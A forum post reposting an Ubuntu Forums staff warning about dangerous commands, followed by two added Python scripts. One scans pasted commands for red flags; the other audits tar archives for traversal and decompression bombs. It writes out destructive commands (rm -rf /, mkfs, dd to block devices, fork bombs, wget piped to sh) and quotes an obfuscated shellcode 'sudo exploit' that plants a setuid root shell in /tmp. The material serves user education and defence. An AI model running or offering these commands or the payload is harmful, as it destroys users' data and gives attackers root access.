naveen_reloaded
!! RecuZant By Birth !!
ATTENTION ALL USERS:
Malicious Commands
I'd like to take a moment of your time to discuss a recent disturbing trend the staff has been noticing on the forums, and also take this as an opportunity to raise awareness of this situation through education.
We've recently had an increase in the number of dangerous commands being posted on the forums. Don't pretend you don't know what I mean -- commands that cause massive damage or disruption to the user's computer.
I'd just like to caution those thinking of doing this that UbuntuForums has a strict zero-tolerance policy when it comes to posting dangerous commands. If you post one of them, particularly in a support thread disguised as advice, expect to be instantly and permanently BANNED, at the account, e-mail, IP, or ISP level. I do not care about intent -- if you mean it as a joke, it is not funny. If you mean it as a lesson, go teach it somewhere else. This behavior is absolutely against the Forum Guidelines and Ubuntu Code of Conduct.
I'd also like to remind users to be cautious when someone tells you to run some command or download some script as a solution to your problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained to you and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages). No matter how hard we try to stay on top of all posts in realtime, we are not perfect.
Regards,
The UbuntuForums Staff.
As requested by some, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment. Again, DANGEROUS COMMANDS -- look but DO NOT RUN.
Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".
Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
Code:
rm -rf /
rm -rf .
rm -rf *
Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
Code:
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
Code:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates. In Bourne-ish shells, like Bash: (This thing looks really intriguing and provokes curiosity)
Code:
:(){ :|:& };:
In Perl
Code:
fork while fork
Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory.
Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GBs, filling your hard drive. You should not touch data from an untrusted source.
Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust.
Code:
wget *some_place/some_file
sh ./some_file
Code:
wget *some_place/some_file -O- | sh
Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (e.g. SourceForge, the author's homepage, an Ubuntu address).
A famous example of this surfaced on a mailing list disguised as a proof-of-concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
  "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
For more detail visit *www.ubuntuforums.org/announcement.php?a=54
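The announcement above tells readers to have a posted command explained and to check it against documentation before running it, and it shows a "proof of concept" whose real payload only appears once the hex string is decoded. The script below is an added example for this thread, not code from the original announcement or from Ubuntu: it decodes the C string literals in a pasted snippet (so the shellcode blob reads the way `strings` would show it on the compiled binary) and scans both the text and the decoded bytes for the red-flag patterns the post lists. The regexes, the flag names, and the `example.invalid` URL in the sample input are this example's own choices; they are heuristics and an obfuscated variant can slip past them.

```python
"""Vet a pasted command, script or C source before running or compiling it.

Added example for this thread, not code from the original announcement.
Two checks the post tells readers to do by hand are mechanised here:
decode any C string literals so a shellcode blob becomes readable, and
scan the text plus the decoded bytes for the dangerous patterns listed.
"""
import re

# (pattern, flag name). Deliberately loose: these are red flags for a human
# to look at, not a parser for every shell dialect. Names are our own.
RED_FLAGS = [
    (re.compile(r"\brm\s+-\w*r\w*\s+(?:/|\.|\*)(?=\s|$)", re.M), "recursive-rm-of-root-cwd-or-glob"),
    (re.compile(r"\bmkfs(?:\.\w+)?\b"), "mkfs"),
    (re.compile(r"\bdd\b.*\bof=/dev/"), "dd-to-block-device"),
    (re.compile(r">\s*/dev/(?:sd|hd|vd|xvd|nvme|mmcblk)"), "redirect-to-block-device"),
    (re.compile(r":\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;\s*:"), "bash-forkbomb"),
    (re.compile(r"\bfork\s+while\s+fork\b"), "perl-forkbomb"),
    (re.compile(r"\b(?:wget|curl)\b.*\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b"), "pipe-to-shell"),
    (re.compile(r"\bchmod\s+(?:[0-7]?[2467][0-7]{3}\b|[ugoa]*\+[rwx]*s)"), "setuid-or-setgid-chmod"),
    (re.compile(r"/bin/(?:ba|da)?sh\b"), "embedded-shell-path"),
    (re.compile(r"/tmp/\."), "hidden-tmp-file"),
    (re.compile(r'__attribute__\s*\(\(\s*section\s*\(\s*"\.text"\s*\)\s*\)\)'), "data-placed-in-text-section"),
]

_SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "a": "\a", "b": "\b",
                   "f": "\f", "v": "\v", "\\": "\\", '"': '"', "'": "'", "?": "?"}


def c_literal_bytes(body: str) -> bytes:
    """Decode the inside of one C string literal (no surrounding quotes).
    A hex escape is taken as at most two digits, which is how shellcode is
    written; a strict C compiler would slurp every following hex digit."""
    out = bytearray()
    i = 0
    while i < len(body):
        if body[i] != "\\":
            out += body[i].encode("latin-1", "replace")
            i += 1
            continue
        rest = body[i + 1:]
        hexm = re.match(r"x([0-9a-fA-F]{1,2})", rest)
        octm = re.match(r"[0-7]{1,3}", rest)
        if hexm:
            out.append(int(hexm.group(1), 16))
            i += 1 + hexm.end()
        elif octm:
            out.append(int(octm.group(), 8) & 0xFF)
            i += 1 + octm.end()
        else:
            ch = rest[:1]
            out += _SIMPLE_ESCAPES.get(ch, ch).encode("latin-1", "replace")
            i += 2
    return bytes(out)


def decode_c_literals(source: str) -> bytes:
    """Concatenate every double-quoted literal in the source, decoded.
    Good enough for a pasted snippet; a stray quote inside a comment
    would confuse it."""
    bodies = re.findall(r'"((?:[^"\\\n]|\\.)*)"', source)
    return b"".join(c_literal_bytes(b) for b in bodies)


def printable_strings(data: bytes, minlen: int = 4) -> list:
    """Same idea as strings(1): runs of printable ASCII of at least minlen."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[ -~]{%d,}" % minlen, data)]


def vet(text: str) -> dict:
    """Return the decoded strings, the red flags hit, and an overall verdict."""
    strings = printable_strings(decode_c_literals(text))
    haystack = text + "\n" + "\n".join(strings)
    flags = sorted({name for rx, name in RED_FLAGS if rx.search(haystack)})
    return {"decoded_strings": strings, "flags": flags, "ok": not flags}


# Sample input: the "sudo exploit" payload quoted in the post.
SUDO_POC = r'''
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
  "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
'''
# Constructed "advice" in the shape the post warns about; the URL is made up.
PIPE_TO_SH = "wget http://example.invalid/fix.sh -O- | sh\n"
BENIGN = "ls -la ~\ndf -h\n"

if __name__ == "__main__":
    for label, sample in [("sudo PoC", SUDO_POC), ("pipe-to-sh", PIPE_TO_SH), ("benign", BENIGN)]:
        report = vet(sample)
        print(label, "OK" if report["ok"] else "RED FLAGS: " + ", ".join(report["flags"]))
        for s in report["decoded_strings"]:
            print("   decoded:", s)
```

Run against the posted payload, the decoded strings include `/bin/sh` and `cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;`, which is the whole story: run under sudo, the "exploit" copies a shell to a hidden file in /tmp and makes it setuid root. The `.text` section attribute is worth flagging on its own, since putting a char array in the executable segment is how a data blob gets to run as code.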
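The tarbomb and decompression-bomb items in the post can both be caught before anything touches the disk, because a tar header already declares each member's name, type, link target and size. The script below is an added example for this thread, not code from the original announcement: it walks the headers of an archive held in memory, flags names and link targets that would land outside the extraction directory, and compares the declared total size and member count against limits, plus the declared-to-compressed ratio that gives a decompression bomb away. The limits, the findings wording and the sample archive (built in memory, with a traversal path, an escaping symlink and 4 MiB of zeros) are this example's own choices.

```python
"""Audit a tar archive before extracting it: tarbomb and decompression-bomb
checks from headers only, without writing a single file.

Added example for this thread, not code from the original announcement.
Limits and wording are our own; tune them to the archives you expect.
"""
import io
import posixpath
import tarfile


def escapes_destination(path: str) -> bool:
    """True if a member path would resolve outside the extraction directory."""
    norm = posixpath.normpath(path)
    return path.startswith("/") or norm == ".." or norm.startswith("../")


def audit_tar(data: bytes, max_files: int = 10_000,
              max_bytes: int = 1 << 30, max_ratio: float = 100.0) -> dict:
    """Read headers only and report anything that should stop an extraction."""
    findings = []
    files = 0
    declared = 0
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf:  # iterates member headers; nothing is extracted
            files += 1
            declared += m.size
            if escapes_destination(m.name):
                findings.append(f"path escapes destination: {m.name}")
            if m.issym():
                # a relative symlink target resolves from the link's own directory
                target = m.linkname if m.linkname.startswith("/") else \
                    posixpath.join(posixpath.dirname(m.name), m.linkname)
                if escapes_destination(target):
                    findings.append(f"symlink escapes destination: {m.name} -> {m.linkname}")
            elif m.islnk() and escapes_destination(m.linkname):
                # hardlink targets are relative to the archive root
                findings.append(f"hardlink escapes destination: {m.name} -> {m.linkname}")
            if m.isdev():
                findings.append(f"device node in archive: {m.name}")
    ratio = declared / max(len(data), 1)
    if files > max_files:
        findings.append(f"{files} members exceeds limit {max_files}")
    if declared > max_bytes:
        findings.append(f"declares {declared} bytes, exceeds limit {max_bytes}")
    if ratio > max_ratio:
        findings.append(f"expansion ratio {ratio:.0f}:1 exceeds {max_ratio:.0f}:1")
    return {"files": files, "declared_bytes": declared, "ratio": ratio,
            "findings": findings, "ok": not findings}


def add_member(tf: tarfile.TarFile, name: str, payload: bytes) -> None:
    """Add a regular file to an archive being written."""
    info = tarfile.TarInfo(name)
    info.size = len(payload)
    tf.addfile(info, io.BytesIO(payload))


def build_sample_archive(malicious: bool) -> bytes:
    """Constructed for this example: a clean tarball, or one carrying a
    traversal path, an escaping symlink and a 4 MiB run of zeros (which gzip
    squeezes into a few KB, the decompression-bomb shape)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        add_member(tf, "good/README", b"harmless text\n")
        if malicious:
            add_member(tf, "../../etc/cron.d/backdoor", b"# constructed sample\n")
            link = tarfile.TarInfo("good/ssh")
            link.type = tarfile.SYMTYPE
            link.linkname = "../../../root/.ssh"
            tf.addfile(link)
            add_member(tf, "good/padding.bin", bytes(4 << 20))
    return buf.getvalue()


if __name__ == "__main__":
    for label, data in [("clean", build_sample_archive(False)),
                        ("bomb", build_sample_archive(True))]:
        report = audit_tar(data, max_bytes=1 << 20)
        print(f"{label}: {len(data)} bytes on the wire, {report['declared_bytes']} declared, "
              f"{report['files']} members, ratio {report['ratio']:.0f}:1")
        for f in report["findings"]:
            print("   ", f)
```

The ratio check is the one that catches a bomb that is otherwise well-behaved: the compressed archive is tiny, the headers declare gigabytes, and no file has to be written to see the mismatch. Even when the audit passes, extracting into a freshly created empty directory, as the post advises, keeps a crafted filename from overwriting anything that matters.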